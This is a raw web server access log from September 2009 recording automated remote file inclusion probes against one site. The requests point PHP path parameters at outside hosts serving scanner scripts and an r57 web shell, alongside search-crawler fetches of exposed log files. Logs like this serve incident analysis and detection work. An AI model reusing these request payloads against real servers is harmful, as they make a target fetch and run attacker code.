222.122.72.216 - - [16/Sep/2009:12:10:30 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:10:30 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:10:30 -0700] "GET /include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:10:59 -0700] "GET /logs/access_080521.log%20%20//include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:11:27 -0700] "GET /main.php?appserv_root=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:11:27 -0700] "GET /logs/access_081107.log//main.php?appserv_root=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:11:27 -0700] "GET /logs//main.php?appserv_root=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.147.248 - - [16/Sep/2009:12:11:35 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.graveyardzombies.org//files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:11:43 -0700] "GET /logs/access_081213.log HTTP/1.0" 200 4019823 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:51 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:51 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:51 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:51 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:51 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:52 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:53 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:53 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:53 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:54 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:54 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:11:54 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:00 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:12:00 -0700] "GET /logs/access_090901.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_secret=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:01 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:01 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:05 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:05 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:10 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:10 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:10 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:34 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:37 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:38 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:43 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:44 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:44 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:12:49 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:12:55 -0700] "GET /logs/access_071120.log HTTP/1.0" 200 34560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:01 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:01 -0700] "GET /logs/access_090519.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:13:24 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:13:24 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:13:25 -0700] "GET /logs/access_080709.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:36 -0700] "GET /logs/access_090403.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:36 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:13:42 -0700] "GET /logs/access_081007.log//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:13:42 -0700] "GET /logs/access_081111.log//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:13:57 -0700] "GET /logs/access_090410.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:14:32 -0700] "GET /logs/access_080813.log HTTP/1.0" 200 5784314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:15:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:15:46 -0700] "GET /skin/zero_vote/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:15:46 -0700] "GET /logs/access_081007.log//skin/zero_vote/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:12:16:35 -0700] "GET /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 200 19846 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:16:47 -0700] "GET /logs/access_081213.log HTTP/1.0" 200 4019823 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:17:03 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:17:03 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:17:03 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:17:45 -0700] "GET /logs/access_090514.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:17:54 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:17:54 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:17:54 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:17:56 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:17:56 -0700] "GET /logs/access_090519.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:17:56 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:03 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:18:21 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:18:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:18:24 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:51 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:51 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:51 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:55 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:55 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:55 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:57 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:57 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:18:57 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:00 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:00 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:00 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:03 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:05 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:05 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:05 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:06 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:06 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:06 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:06 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:06 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:17 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:19 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:19 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:19 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:20 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:22 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:19:30 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:19:33 -0700] "GET /logs/access_081109.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:20:04 -0700] "GET /logs/access_090506.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:20:04 -0700] "GET /logs/access_090426.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:20:31 -0700] "GET /logs/access_090903.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:20:31 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:20:31 -0700] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:21:08 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:21:08 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:21:08 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:21:16 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:12:22:01 -0700] "GET /logs/access_090514.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:12:22:03 -0700] "GET /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 200 19846 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:12:22:04 -0700] "GET /logs/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:12:22:05 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
